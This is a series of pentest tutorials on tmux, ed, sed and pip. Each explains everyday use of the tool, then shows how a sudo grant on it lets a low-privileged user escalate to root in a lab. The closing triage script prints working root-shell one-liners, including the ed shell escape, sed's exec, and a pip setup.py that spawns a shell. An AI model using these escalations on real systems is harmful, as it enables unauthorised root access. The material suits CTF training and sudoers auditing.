Linux For Pentester: tmux Privilege Escalation

In this article we describe tmux, a terminal multiplexer. It lets you run and switch between several terminal sessions inside a single window, which is useful for running more than one command-line program at the same time.

NOTE: “The main objective of publishing the series of “Linux for pentester” is to introduce the circumstances and any kind of hurdles that can be faced by any pentester while solving CTF challenges or OSCP labs which are based on Linux privilege escalations. Here we do not criticize any kind of misconfiguration that a network or system administrator does for providing higher permissions on any programs/binaries/files & etc.” 

Table of Content

  • What is tmux
  • How to use tmux
  • tmux framework
  • tmux commands
  • Assigning Sudo rights
  • Exploiting Sudo rights

What is tmux?: tmux is a terminal multiplexer. It starts a server process on the host, and you talk to that server through a client in your terminal window. If the client disconnects, the server keeps running; when you reconnect later, even after rebooting your own computer, you can reattach to the tmux session and the programs and files you were working with are still open.

In other words, tmux is a tool that lets you open multiple windows and split views (called "panes" in tmux lingo) inside one terminal window.

How to use tmux: Like other tools, tmux supports many commands for its various functions. We describe each of its major operations one by one below.

Most operations are invoked by pressing a key combination called the prefix (Ctrl-b by default) and then typing a letter. Many letters are bound to tmux actions.

tmux framework: Everything tmux does is easier to understand through its hierarchy, shown below: one server holds one or more sessions, each session holds one or more windows, and each window is divided into one or more panes.

tmux commands: There is a long list of commands for working with tmux. In this article we run through the major operations.

First, the help output: run tmux with --help on the Kali terminal as shown below, and it prints its usage summary.

tmux operations fall into the three levels described above in its framework. We start with the first, sessions.

Operate tmux Sessions: Sometimes even multiple windows and panes aren’t enough and you need to separate the layouts logically by grouping them into separate sessions.

Sessions are useful for completely separating work environments.

tmux supports many session operations (the image below lists them); a few are described here.

  • Create a new session: A new session is created with the tmux new command, as in the image below (tmux new -s Ignite).

In this command "-s" names the new session and "Ignite" is the name I chose.

tmux creates a session called Ignite and shows its name in the status line at the bottom of the terminal. In the same way you can create multiple sessions under different names as needed.

  • List all created sessions: once the sessions have been created you can check them with tmux ls (short for list-sessions):

This lists every session that exists. In the image below tmux lists the sessions I created following the procedure above.

Operate tmux Windows: When a tmux session starts it has a single window by default, but tmux also lets you attach multiple windows to the same session and switch between them as needed. This is useful when you want to run several jobs in parallel.

Besides creating windows, tmux can rename a window, switch between windows, and more.

Initially the status line shows "0: bash*": 0 is the window's index, bash is the window name (which can be renamed), and * marks the window you are currently in. When you create more windows, tmux lists all of them in the status line at the bottom of the terminal.

Note: We know that working of tmux is done with joining prefix with any letter as per requirement. Find the below table to understand it clearly.

In this article I created 5 windows, as shown in the image below.

  • Create a new window: press the prefix (Ctrl-b) and then c.

This creates a new window. Repeat the same key sequence to create more windows, as in the image below.

  • Rename window: by default tmux names a window after the shell ("bash"), but it can be renamed: press the prefix and then , (comma) and type the new name. Here I rename my last window as shown below.

  • Switch window: you can move between windows, which is what makes working in parallel practical. There are several ways: prefix and n (next window), prefix and p (previous window), or prefix and the window's index number.

  • Display a summary: to see everything created so far, use tmux's list commands (list-sessions, list-windows, list-panes), as shown below:

Operate tmux Panes: By the help of tmux, we can divide each window into multiple panes. This is useful when you want outputs from multiple processes visible within a single window.

There are several options here: splitting a window vertically or horizontally, rotating panes, and switching between panes. We check each in turn.

Note: use below table for your reference

Here I split my window into two panes side by side (a vertical split, prefix and %):

In the image below I further split the window horizontally (prefix and "), stacking a second pane below.

Suppose we have several panes, each holding some information, and we want to rotate them. Then press the prefix and { (or } to rotate the other way):

This swaps the current pane with the previous one, which moves it to the left (or up).
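The session, window and pane operations above were shown in screenshots. What follows is an added example, not from the original article, that performs the same operations from a script using the tmux subcommands behind the prefix keys (each key binding is noted in a comment). It works against a detached session, so no terminal is needed; the session and window names are chosen for this example.

```shell
#!/bin/sh
# Added example, not from the original article: the tmux operations above,
# driven by tmux subcommands instead of prefix keys. The key binding each
# subcommand corresponds to is given in the comment. Session/window names
# are chosen for this example only.
set -eu

SESSION=Ignite

# Create a detached session (tmux new -s Ignite), then add windows and panes.
tmux_demo() {
    tmux new-session -d -s "$SESSION" -x 120 -y 40   # tmux new -s Ignite
    tmux new-window -t "$SESSION" -n shell2         # prefix c (named here instead of "bash")
    tmux rename-window -t "$SESSION:1" renamed      # prefix ,
    tmux split-window -h -t "$SESSION:0"            # prefix %  (side by side)
    tmux split-window -v -t "$SESSION:0"            # prefix "  (stacked)
    tmux swap-pane -U -t "$SESSION:0"               # prefix {  (move pane up/left)
    tmux select-window -t "$SESSION:0"              # prefix 0 / n / p
    # tmux ls and the list-* commands print the server > session > window > pane hierarchy.
    tmux list-sessions -F 'session #{session_name}: #{session_windows} windows'
    tmux list-windows -t "$SESSION" -F '  window #{window_index}: #{window_name}'
    tmux list-panes -t "$SESSION:0" -F '    pane #{pane_index} (#{pane_width}x#{pane_height})'
}

# Number of panes in window 0 (3 after the two splits above).
pane_count() {
    tmux list-panes -t "$SESSION:0" | wc -l | tr -d ' '
}

# Name of the window with the given index.
window_name() {
    tmux display-message -p -t "$SESSION:$1" '#{window_name}'
}

# Remove the session again (tmux kill-session -t Ignite).
cleanup() {
    tmux kill-session -t "$SESSION" 2>/dev/null || true
}

# Run with "run" as argument to see the output:  sh tmux_demo.sh run
if [ "${1:-}" = "run" ]; then
    cleanup
    tmux_demo
    cleanup
fi
```

Because the session is created detached, the same script can be used to pre-build a working layout on a box you later attach to with tmux attach -t Ignite.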

Assigning Sudo Rights

A sudo right is a permission that allows a user to execute a program with superuser privileges. Now we start the privilege escalation for tmux. First we set up a lab in which tmux can be run with administrative rights; then we check what effect the sudo right on tmux has.

So we grant sudo permission on tmux, so that a local user can run tmux as the root user.

Type the following to enable this sudo right:

It is shown in the image below, in which I created a local user (test). To add the sudo right, open /etc/sudoers (with visudo) and add the following line under the user privilege specification.

Exploiting Sudo rights

Now we exploit tmux by taking advantage of the sudoers permission. For this we need a session on the victim's machine as a local user; from that foothold we escalate to root.

First we connect to the target machine over ssh; type the following command to log in as the local user.

Then we look for the sudo rights of user "test" (sudo -l) and find that "test" can run the tmux command as root without a password.

Knowing that test has this sudo right, we use the tmux command to escalate the privileges of the test user: running tmux through sudo starts a new tmux session, and the shell inside it runs as root.

Conclusion: This will launch a new terminal with root privilege shell.

Author: Komal Singh is a Cyber Security Researcher and Technical Content Writer, an enthusiastic pentester and Security Analyst at Ignite Technologies.

Linux for Pentester: ed Privilege Escalation

In this article we introduce a line-oriented text editor, "ed", which is used to create, display, alter and otherwise operate on text files. All ed commands operate on whole lines or ranges of lines; e.g. the "d" command deletes lines, "m" moves lines, "t" copies lines, and so on. We then check how these features can be used for privilege escalation.

Table of Content

Overview to ed                               

  • Summary to ed
  • Primary Action attained using ed

Abusing ed

  • SUDO Lab setups for privilege Escalation
  • Exploiting SUDO

Summary to ed

The ed command in Linux starts the "ed text editor", a line-based editor. Its minimal interface makes it simple to work with text files: it can create, edit, display and manipulate files.

Editing is done in two distinct modes: command mode and input mode. In command mode, ed reads commands from standard input and executes them to manipulate the contents of the editor buffer. When an input command such as 'a' (append), 'i' (insert) or 'c' (change) is given, ed enters input mode and reads text until a line containing only a period (.) ends it. Commands like 'm' (move), 'd' (delete) and 't' (copy) act on lines without entering input mode.

ed is the original UNIX text editor, written in 1969, and was later succeeded by vi and emacs.

Now type its help command to know more about “ed”.

Fundamental activities achieved by "ed": ed supports many operations; we go through them one by one.

Starting ed: At the start, the terminal looks like the image below when the command is run. By default the editor opens an empty buffer to write into, the same way other command-line editors behave when invoked without a file name.

Now we create a text file with some content. First we type 'a' (append) before entering anything, and once we finish writing we enter a single period (.) on a line by itself to tell the editor we are done.

Note: The main thing to remember is that 'a' enters input mode and '.' leaves it. To save the buffer to a file, use 'w' followed by the file name of your choice; ed writes the file and prints the number of bytes written. Then 'q' quits the editor.

For the confirmation of your created file i.e. whether it has been created or not you can recheck it by using “cat” command.

Edit the file with ed: Now, in case you need to edit the same file again, then it can simply be done by passing the name of the file as an argument to the ed command, and then following the same procedure as discussed above.

Here in the below image, I’m adding one more line to my file “info.txt” which I have created above by following the same process.

Note: The same sequence, 'a' to append, '.' to end input, 'w' to write and 'q' to quit, applies whenever you edit with ed.

Change a specific line: So far we have covered basic editing; now some more editing operations, for example changing a specific line.

The image below shows how to print a particular line using the 'p' and 'n' commands.

'p' prints the current line (the line ed's cursor is on), while 'n' prints it together with its line number.

After opening a file the current line is the last line, so 'n' shows the last line at first. Typing a line number by itself moves to that line and prints it.

Once you are on the line you want to change, enter 'c' and retype the line. For example, I changed the 5th line, the last line of my file, by adding more detail to it. I saved the file with the same 'w' and 'q' sequence and checked the modification with 'cat'.

Error messages in ed: When you type something ed cannot understand, it prints only a question mark (?) by default. To learn what went wrong, ed provides the 'h' command.

The screenshot below shows that when I typed 'b', ed answered with (?), the error marker, and on typing 'h' it explained the error: unknown command.

Copy and move lines with ed: ed can also copy a line to another position, or move it: 't' copies a line and 'm' moves it. Precede 't' with the number of the line to copy and follow it with the destination line number. For example, in the image below I copied the 5th line to position 0, the top of the file (5t0), and saved the change.

In that command 5 is the line to copy and 0 is the line after which the copy is placed.

Note: Use 'm' instead of 't' to move the line rather than copy it.

Search with ed: Searching for a line by keyword is easy in ed. Start ed with the -p option (for example -p%), which sets a prompt so you can see when ed is waiting for a command. Then, to search forward, enter / followed by the keyword. When you press enter the editor prints the first line containing the keyword; entering // repeats the search to continue.

In the image below ed printed only those lines that contain the search keywords, misconfiguration and Linux.
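To make the ed session reproducible, here is an added example (not from the article) that replays the operations above, creating a file, appending to it, printing with n, changing line 5 with c, copying with 5t0 and searching, by feeding ed its commands from here-documents. The file name and its text are constructed for this example; ed's -s option suppresses the byte counts so only the printed lines appear.

```shell
#!/bin/sh
# Added example, not from the article: the ed operations above replayed
# non-interactively. The file name and its lines are made up for this example.
# "ed -s" silences the byte counts that 'w' normally prints; a prompt (-p%)
# is pointless when ed reads a script, so none is set.
set -eu

WORK=$(mktemp -d)

# Create info.txt: 'a' enters input mode, '.' ends it, 'w' writes, 'q' quits.
create_file() (
    cd "$WORK"
    ed -s <<'EOF'
a
Linux for pentester
tmux privilege escalation
sudo misconfiguration in the lab
Ignite Technologies
the last line
.
w info.txt
q
EOF
)

# Append one more line to the existing file (same a / . / w / q sequence).
append_line() (
    cd "$WORK"
    ed -s info.txt <<'EOF'
a
appended later
.
w
q
EOF
)

# 'n' prints the current line with its number; right after opening a file
# the current line is the last line.
current_line() (
    cd "$WORK"
    printf 'n\nq\n' | ed -s info.txt
)

# Change line 5 with 'c' (enters input mode like 'a').
change_line5() (
    cd "$WORK"
    ed -s info.txt <<'EOF'
5c
the last line, now with more detail
.
w
q
EOF
)

# '5t0' copies line 5 to the top; 'm' instead of 't' would move it.
copy_line5_to_top() (
    cd "$WORK"
    printf '5t0\nw\nq\n' | ed -s info.txt
)

# '/keyword/' prints the first line containing the keyword (the search wraps
# around the end of the buffer); 'g/keyword/p' prints every matching line.
search_first() (
    cd "$WORK"
    printf '/%s/\nq\n' "$1" | ed -s info.txt
)
search_all() (
    cd "$WORK"
    printf 'g/%s/p\nq\n' "$1" | ed -s info.txt
)

show_file() { cat "$WORK/info.txt"; }

# Run with "run" as argument to step through everything:  sh ed_demo.sh run
if [ "${1:-}" = "run" ]; then
    create_file; append_line
    echo "current line: $(current_line)"
    change_line5; copy_line5_to_top
    echo "first match: $(search_first pentester)"
    echo "all lines containing 'line':"; search_all line
    show_file
fi
```

Each function opens the file, runs its commands and quits, exactly the way the interactive session in the screenshots does, so the intermediate states can be inspected with cat between steps.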

Exploiting ed

Sudo Rights Lab setups for Privilege Escalation

Now we start privilege escalation for ed. First we set up a lab in which ed can be run with administrative rights; then we check what effect the sudo right on ed has and how it can be used for privilege escalation.

The image below shows it: I created a local user (test) and gave it a sudo right to run ed as root.

To add the sudo right, open /etc/sudoers (with visudo) and add the following line under the user privilege specification.

Exploiting Sudo rights

Now we exploit ed by taking advantage of the sudoers permission. For this we need a session on the victim's machine as a local user; from that foothold we escalate to root.

First we connect to the target machine over ssh; type the following command to log in as the local user.

Then we look for the sudo rights of user "test" (sudo -l) and find that "test" can run the ed command as root without a password.

Knowing that test has this sudo right, we run ed through sudo, which opens an empty buffer as root, and use ed's shell escape (an exclamation mark followed by a command, e.g. !/bin/sh) to spawn a bash/sh shell with root privileges.

Conclusion: We have successfully exploited "ed" by using its own functionality after it was granted higher privileges.

Author: Komal Singh is a Cyber Security Researcher and Technical Content Writer, an enthusiastic pentester and Security Analyst at Ignite Technologies.

Linux for Pentester: sed Privilege Escalation

This article takes readers through the Stream Editor (sed), one of the most prominent text-processing tools on GNU/Linux. It is a brief introductory guide to how sed works and how it can be used in the course of privilege escalation.

NOTE: “The main objective of publishing the series of “Linux for pentester” is to introduce the circumstances and any kind of hurdles that can be faced by any pentester while solving CTF challenges or OSCP labs which are based on Linux privilege escalations. Here we do not criticize any kind of misconfiguration that a network or system administrator does for providing higher permissions on any programs/binaries/files & etc.”

Table of Content

Overview of sed                                            

  • Summary to sed
  • Chief Action achieved using sed
    • Replacement with the sed command
    • Printing and viewing from sed command
    • Deleting lines with sed

Abusing sed

  • SUDO Lab setups for privilege Escalation
  • Exploiting SUDO

Summary to sed

The sed command in Linux/UNIX stands for "stream editor". It can perform many operations on a file: searching, find and replace, insertion and deletion. Its most common use is find and replace. With sed you can edit a file without opening it in an editor, which is a much faster way to find and replace text. It is a powerful text stream editor that can insert, delete and search in any file as the user requires, and it supports regular expressions for complex pattern matching. To learn more about sed we start with its help option.

Note: This article omits several commands, as our main concern is sed's use in privilege escalation.

Key actions achieved by “sed”

  • Replacement with the sed command: sed performs many tasks, including insertion, deletion and modification of a file on request, so we now explore its utilities one by one.

1.1 Substituting a string: sed replaces or swaps strings; whenever we need to replace a string within a file we frame the command as shown below (the expression is s/Ignite/Egnyte/):

In this command "s" is the substitute command, "Ignite" is the search pattern and "Egnyte" is the replacement string. By default sed replaces only the first occurrence of the pattern in each line; the second, third and later occurrences in the same line are left alone.

1.2 Substituting the nth occurrence in a line: To replace the nth occurrence (second, third, and so on) of a pattern in a line, add that number as a flag after the closing slash, e.g. s/Ignite/Egnyte/2.

Here I replace the 2nd occurrence in each line.

1.3 Substituting all occurrences at once: Since sed replaces only the first occurrence per line by default, to replace every occurrence in the file use the "g" flag (s/Ignite/Egnyte/g).

1.4 Substituting from the nth occurrence onward: "g" on its own changes every occurrence in every line; to start replacing only from a specific occurrence, put that number in front of g (for example 3g).

With this command sed replaces every occurrence from the nth one onward in each line.

Note: In the image below you cannot see any change for the "3g" flag because no line of my file contains a 3rd occurrence of the word, but whenever a line contains the substituted word several times you can clearly see how everything from the nth occurrence on is changed.

1.5 Substituting within a range of lines: We can limit sed to replace the string only in a range of lines by putting the range in front of the s command, as shown below (for example 1,3s/Ignite/Egnyte/).

With this command sed replaces "Ignite" only from the first line to the third line.

Note: Use "$" as the end index to substitute from the nth line to the last line of the file.

  • Printing and viewing with sed: Apart from substituting strings, sed can print and view a file as instructed.

2.1 Printing the replaced line with the p flag: The "p" flag prints a line in which a replacement was made. Without -n sed also prints every line as usual, so a replaced line appears twice on the terminal, while a line without the search pattern is printed only once.

2.2 Printing only the replaced lines: To print only the substituted lines, use the "-n" option, which suppresses the automatic printing, together with the p flag as shown below.

As the image below shows, with "-n" the p flag prints only the replaced lines.

2.3 Printing lines with numbers: Similar to "cat -n", sed can number the lines of a file, using its "=" command, which prints each line's number, as framed below.

With this command sed prints the file with each line numbered.

2.4 Display a file from line x to line y: To view a range of a file from a start index to an end index, write the range in front of p together with -n, as in -n '2,5p':

If we use "d" instead of "p" (and drop -n), sed prints the entire file except the given range.

2.5 Print the nth line of the file: Leave out the end index to print only one specific line.

As the screenshot below shows, with that command sed printed only the 4th line.

2.6 Print from the nth line to the end of file: To print a file from its nth line to the last line, frame the command as below:

Here "$" denotes the last line of the file.

2.7 Print only lines matching a pattern: To print only those lines that match a given pattern, use the pattern (between slashes) as the address:

The image below shows how this works: I printed only the lines containing the word "training".

2.8 Print from a matching line up to the nth line: A pattern and a line number can be combined in one address range, so that "p" prints from the first line matching the pattern up to line n.

3 Deleting lines with sed: Now we check how to delete lines from a file with sed.

3.1 Remove a specific line: To delete a particular line, use the "d" command with that line number. Here I delete the 3rd line of "Ignite.txt".

3.2 Remove a range of lines: To delete a range of lines, give its start and end line numbers. In the image below I deleted lines 3 to 5 of "Ignite.txt" and got the remaining content as output.

3.3 Remove from the nth line to the last line: Instead of a fixed end index, use "$" to delete through the end of the file.

Here "2" is the line where deletion starts and "$" means delete up to and including the last line.

3.4 Remove the last line: Without a start index, "$d" deletes only the last line of the file.

3.5 Remove lines matching a pattern: Sometimes we not only want to print the lines matching a pattern but to delete them; in that case we frame the command below.

In the image below sed deleted every line containing the word "training".
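The substitution (1.x), printing (2.x) and deletion (3.x) commands above were all shown as screenshots. Here is an added example, not from the article, that wraps each of them in a function and runs them over a constructed Ignite.txt so the effect of every flag can be compared side by side; the file contents are made up, with line 2 containing the pattern three times so that the 2, g and 2g flags behave differently.

```shell
#!/bin/sh
# Added example, not from the article: the substitution (1.x), printing (2.x)
# and deletion (3.x) commands above, each in a function, run over a
# constructed file. Requires GNU sed for the "2g" (number+g) flag.
set -eu

WORK=$(mktemp -d)
FILE="$WORK/Ignite.txt"
# Constructed sample input; line 2 contains the pattern three times.
printf '%s\n' \
    'Ignite Technologies offers training' \
    'Ignite Ignite Ignite red team training' \
    'Linux privilege escalation' \
    'Ignite lab setup' \
    'OSCP style training lab' > "$FILE"

# --- 1. substitution ---------------------------------------------------
sub_first()     { sed 's/Ignite/Egnyte/'    "$FILE"; }   # 1.1 first occurrence per line
sub_second()    { sed 's/Ignite/Egnyte/2'   "$FILE"; }   # 1.2 only the 2nd occurrence
sub_all()       { sed 's/Ignite/Egnyte/g'   "$FILE"; }   # 1.3 every occurrence
sub_from_2nd()  { sed 's/Ignite/Egnyte/2g'  "$FILE"; }   # 1.4 2nd occurrence onward
sub_lines_1_3() { sed '1,3s/Ignite/Egnyte/' "$FILE"; }   # 1.5 only lines 1-3
sub_to_end()    { sed '2,$s/Ignite/Egnyte/' "$FILE"; }   # 1.5 note: $ = last line

# --- 2. printing -------------------------------------------------------
print_twice()     { sed 's/Ignite/Egnyte/p'    "$FILE"; }  # 2.1 replaced lines twice
print_replaced()  { sed -n 's/Ignite/Egnyte/p' "$FILE"; }  # 2.2 only replaced lines
number_lines()    { sed = "$FILE" | sed 'N;s/\n/: /'; }    # 2.3 '=' prints numbers
print_range()     { sed -n '2,4p'       "$FILE"; }         # 2.4 lines 2-4
skip_range()      { sed '2,4d'          "$FILE"; }         # 2.4 everything but 2-4
print_line4()     { sed -n '4p'         "$FILE"; }         # 2.5 one line
print_from3()     { sed -n '3,$p'       "$FILE"; }         # 2.6 line 3 to end
print_match()     { sed -n '/training/p' "$FILE"; }        # 2.7 pattern address
print_match_to4() { sed -n '/Linux/,4p'  "$FILE"; }        # 2.8 first match up to line 4

# --- 3. deletion -------------------------------------------------------
del_line3()    { sed '3d'          "$FILE"; }   # 3.1
del_3_to_5()   { sed '3,5d'        "$FILE"; }   # 3.2
del_2_to_end() { sed '2,$d'        "$FILE"; }   # 3.3
del_last()     { sed '$d'          "$FILE"; }   # 3.4
del_match()    { sed '/training/d' "$FILE"; }   # 3.5

# Print every variant when run directly:  sh sed_demo.sh run
if [ "${1:-}" = "run" ]; then
    for f in sub_first sub_second sub_all sub_from_2nd sub_lines_1_3 sub_to_end \
             print_twice print_replaced number_lines print_range skip_range \
             print_line4 print_from3 print_match print_match_to4 \
             del_line3 del_3_to_5 del_2_to_end del_last del_match; do
        echo "== $f"; "$f"
    done
fi
```

None of these commands modify Ignite.txt; sed writes the edited stream to stdout, and only the -i option (not used here) edits the file in place.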

Abusing sed

Sudo Rights Lab setups for Privilege Escalation

Now we start our privilege escalation. First we set up a lab in which sed can be run with administrative rights; then we check what impact the sudo right on sed has and how it can be used for privilege escalation.

The image below shows it: I created a local user (test) with a sudo right to run sed as root.

To add the sudo right, open /etc/sudoers (with visudo) and add the following line under the user privilege specification.

Exploiting Sudo rights

Now we exploit sed by taking advantage of the sudoers permission. For this we first need a session on the victim's machine; suppose we have one as a local user, from which we escalate to root.

So we connect to the target machine over ssh; type the following command to log in as the local user.

Then we look for the sudo rights of user "test" (sudo -l) and find that "test" can run the sed command as root without a password.

Now we use sed through sudo to access /etc/passwd with root privileges. Because sed runs as root it can read any file, and with -i edit one in place, which is enough to escalate or maintain access with elevated privileges.

Conclusion: We have successfully exploited "sed" by using its own functionality after it was granted higher privileges.

Reference link: https://gtfobins.github.io

Author: Komal Singh is a Cyber Security Researcher and Technical Content Writer, an enthusiastic pentester and Security Analyst at Ignite Technologies.

Linux for Pentester: pip Privilege Escalation

This article draws readers' attention to another very useful command from the Linux for pentesters list. Besides copying, downloading and searching, users need another common operation: installing packages. So in this article we introduce the command for that task, "pip". Its main uses are to install, uninstall and search for Python packages. Knowing this, we check how pip can be used in our mission of privilege escalation.

NOTE: "The main objective of publishing the series of "Linux for pentester" is to introduce the circumstances and any kind of hurdles that can be faced by any pentester while solving CTF challenges or OSCP labs which are based on Linux privilege escalations. Here we do not criticize any kind of misconfiguration that a network or system administrator does for providing higher permissions on any programs/binaries/files & etc."

Table of Content

Introduction to pip                                        

  • Major Operation performed using pip

Exploiting pip

  • SUDO Lab setups for privilege Escalation
  • Exploiting SUDO

Introduction to pip

Before we start, a quick check on what a 'Python package' actually is. It is a Python module that can contain other modules or, recursively, other packages; it is the kind of thing you import in Python code. Many tools exist to install such packages, and "pip" is the most widely used today.

pip is a recursive acronym usually expanded as "pip installs packages"; it is the tool for installing and managing Python packages. It is useful for web development and for sysadmins managing cloud resources. We start by running its help command to see the range of pip's operations.

Major operations performed by “pip”

List installed packages: To list all Python packages installed on the machine, use pip's "list" command. The list command has several options that cover what a user typically needs; some of them are described below:

  • List installed packages: This will help in listing all the installed packages.

Other options for package listing:

Syntax: pip list  <options>

List outdated packages: To list the installed packages that are outdated, use the "--outdated" option with pip list; it prints each outdated package with its current and latest version.

List installed packages with column formatting: To display the output in a specific format, use the "--format" option. To list the details in columns, frame the command as below (--format=columns).

List outdated packages with column formatting: This is the same format option combined with --outdated, with extra fields for the current version, latest version and type of each installed package.

List packages that are not dependencies of other packages: To list only the installed packages that no other package depends on, frame the command as below (--not-required).

Install a new package: As described above, the main purpose of pip is installing new packages; here I install "flask".

Syntax: pip install <package name>

Show information about a package: The "show" command prints detailed information about an installed package.

Syntax: pip show <package name>

As the image below shows, the show command printed the relevant information about flask.

Uninstall a package: Besides installing packages we also need the reverse, uninstallation. pip provides this too, and any package can be uninstalled without hassle.

Syntax: pip uninstall <package name>

In the image below I uninstall "jinja2", a templating engine for Python.

Freeze the installed packages: Freezing is the procedure in which pip reads the versions of all packages installed in the local (virtual) environment and produces a text file listing each package with its exact version, i.e. a requirements file. Use the "freeze" command as shown below.

Syntax: pip freeze > <filename>

Search for a package: The search command looks up available Python packages on PyPI; a search term usually returns a fairly broad set of packages.

Syntax: pip search <package name>

Often we want to search for packages directly on the PyPI website, which provides search over its index and a way to filter results. Here I frame the command to search for "keyring". Note: PyPI has since disabled the XML-RPC search API that pip search relied on, so on current systems the command returns an error and the search has to be done on the website.

Create a hash for a package: A hash value is a fixed-length string produced by a hashing algorithm. One of its chief uses is to verify the integrity of data (a file, an attachment, a download, etc.).

Syntax: pip hash <package name>

pip provides this too, to maintain the integrity of the packages it installs: pip hash prints a --hash=sha256:... line that can be placed in a requirements file, and pip then refuses any download whose digest does not match. In the image below I use it to create the hash value of a file, "rockyou.txt".

Download a file or package: Besides the tasks above, pip can also download a package (or an archive from a URL) without installing it, either into the current directory or into a given path (-d).

In the image below I use it to download an archive from a remote location.

Syntax: pip download <package or URL>
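The list, freeze and hash commands above are the ones that matter for dependency hygiene, so here is an added example (not from the article) that turns them into a hash-pinned requirements entry: it lists the top-level packages in freeze format, and for a local archive computes the pip hash and cross-checks it against sha256sum, since pip hash uses SHA-256 by default. The "archive" is a constructed file so the example runs offline, and whichever of pip3/pip is on PATH is used.

```shell
#!/bin/sh
# Added example, not from the article: pip list/freeze/hash used for
# dependency pinning. The "archive" hashed here is a constructed file, and
# whichever of pip3/pip is on PATH is used.
set -eu

PIP=$(command -v pip3 || command -v pip || true)

# Top-level packages only (--not-required drops packages pulled in as
# dependencies), in requirements syntax, one name==version per line.
top_level_packages() {
    "$PIP" list --not-required --format=freeze 2>/dev/null
}

# SHA-256 of a file via the system tool, as an independent reference.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# SHA-256 as reported by "pip hash" (default algorithm sha256); its output is
#   <path>:
#   --hash=sha256:<digest>
pip_sha256_of() {
    "$PIP" hash "$1" | sed -n 's/^--hash=sha256://p'
}

# Build a requirements line that pins a package to an exact digest. With
# "pip install --require-hashes -r requirements.txt" pip refuses any archive
# whose digest differs, which is the integrity check the article alludes to.
pin_line() {  # pin_line <name> <version> <archive>
    printf '%s==%s --hash=sha256:%s\n' "$1" "$2" "$(pip_sha256_of "$3")"
}

# Construct a stand-in "archive" so the example runs offline.
make_sample_archive() {
    f=$(mktemp)
    printf 'not a real wheel, just sample bytes\n' > "$f"
    printf '%s\n' "$f"
}

# Run with "run" as argument:  sh pip_pin.sh run
if [ "${1:-}" = "run" ] && [ -n "$PIP" ]; then
    ARCHIVE=$(make_sample_archive)
    echo "sha256sum: $(sha256_of "$ARCHIVE")"
    echo "pip hash : $(pip_sha256_of "$ARCHIVE")"
    pin_line examplepkg 1.0.0 "$ARCHIVE"
    echo "--- top-level packages ---"; top_level_packages
fi
```

A requirements file built this way is what makes pip download and pip install verifiable: the digest is checked before anything from the archive is executed.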

Exploiting pip

Sudo Rights Lab setups for Privilege Escalation

Now we start privilege escalation. First we set up a lab in which pip can be run with administrative rights; then we check what influence the sudo right on pip has and how it can be used for privilege escalation.

The image below shows it: I created a local user (test) with a sudo right to run pip as root.

To add the sudo right, open /etc/sudoers (with visudo) and add the following line under the user privilege specification.

Exploiting Sudo rights

Now we exploit pip by taking advantage of the sudoers permission. Suppose we have a session on the victim's machine as a local user, from which we escalate to root.

First we connect to the target machine over ssh; type the following command to log in as the local user.

Then we look for the sudo rights of user "test" (sudo -l) and find that "test" can run the pip command as root without a password.

Knowing that test has this sudo right, we use pip in the privileged context: pip install executes the setup.py of a package installed from a local source directory, so installing a package we control runs our Python code as root, which can read the file system or spawn a root shell, and so escalate or maintain access with higher privileges.
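Each of the four "Exploiting Sudo rights" sections in this series (tmux, ed, sed and pip) follows the same pattern: log in as the low-privileged user, run sudo -l, and use the binary's own features to get root. The screenshots of those steps are not reproduced on this page, so here is an added example, not the articles' own commands: a small triage script that parses sudo -l output, extracts every NOPASSWD command, and prints the matching GTFOBins sudo technique for the four binaries covered (quoted from gtfobins.github.io, which the articles cite). The sudo -l text it parses is constructed to match the lab setup described above (user test, passwordless entries). The script only prints the commands and does not run them, since they need the sudo grant to exist. Caveats: the sed one-liner relies on GNU sed's e command and works on any readable file, /etc/hosts in the GTFOBins entry; the pip one-liner assumes a pip that executes setup.py when installing from a local directory.

```shell
#!/bin/sh
# Added example, not from the articles: triage "sudo -l" output and map each
# NOPASSWD binary from this series to its GTFOBins sudo technique.
# The GTFOBins commands are quoted from gtfobins.github.io; nothing here is
# executed, the script only prints what to run.
set -eu

# Constructed sudo -l output for the lab user "test"; the sudoers line behind
# the first entry would be:   test ALL=(root) NOPASSWD: /usr/bin/tmux
SAMPLE_SUDO_L='Matching Defaults entries for test on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User test may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/tmux
    (root) NOPASSWD: /bin/ed, /bin/sed
    (root) NOPASSWD: /usr/bin/pip
    (root) /usr/bin/vim'

# Print the basename of every command on a NOPASSWD line, one per line.
# Entries that still ask for a password (vim above) are also abusable but are
# skipped, because the articles' scenario is passwordless sudo.
nopasswd_binaries() {
    sed -n 's/.*NOPASSWD:[[:space:]]*//p' |
        tr ',' '\n' |
        awk 'NF { n = split($1, p, "/"); print p[n] }'
}

# GTFOBins "sudo" entry for each binary covered in this series.
gtfobins_hint() {
    case "$1" in
        tmux) echo 'sudo tmux' ;;                                 # shell inside tmux is root
        ed)   echo "sudo ed   (then at ed's prompt: !/bin/sh)" ;;  # ed's shell escape
        sed)  echo "sudo sed -n '1e exec sh 1>&0' /etc/hosts" ;;  # GNU sed 'e' command
        pip)  cat <<'EOF'
TF=$(mktemp -d); echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py; sudo pip install $TF
EOF
              ;;
        *)    echo "no entry in this table; check https://gtfobins.github.io/gtfobins/$1/" ;;
    esac
}

# Read sudo -l output on stdin and print "<binary>: <command>" per entry.
triage() {
    nopasswd_binaries | while read -r bin; do
        printf '%s: %s\n' "$bin" "$(gtfobins_hint "$bin")"
    done
}

# On a real target:   sudo -l | sh triage.sh stdin
# Offline demo:       sh triage.sh demo
case "${1:-}" in
    demo)  printf '%s\n' "$SAMPLE_SUDO_L" | triage ;;
    stdin) triage ;;
esac
```

The same parser is the check a defender wants: anything it prints for a non-admin account is a sudoers entry that hands out root, and the fix is to remove the NOPASSWD grant on these binaries rather than to trust their restricted-looking names.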

Conclusion: We have successfully exploited pip by using its own functionality after it was granted higher privileges.

Reference link: https://gtfobins.github.io

Author: Komal Singh is a Cyber Security Researcher and Technical Content Writer, an enthusiastic pentester and Security Analyst at Ignite Technologies.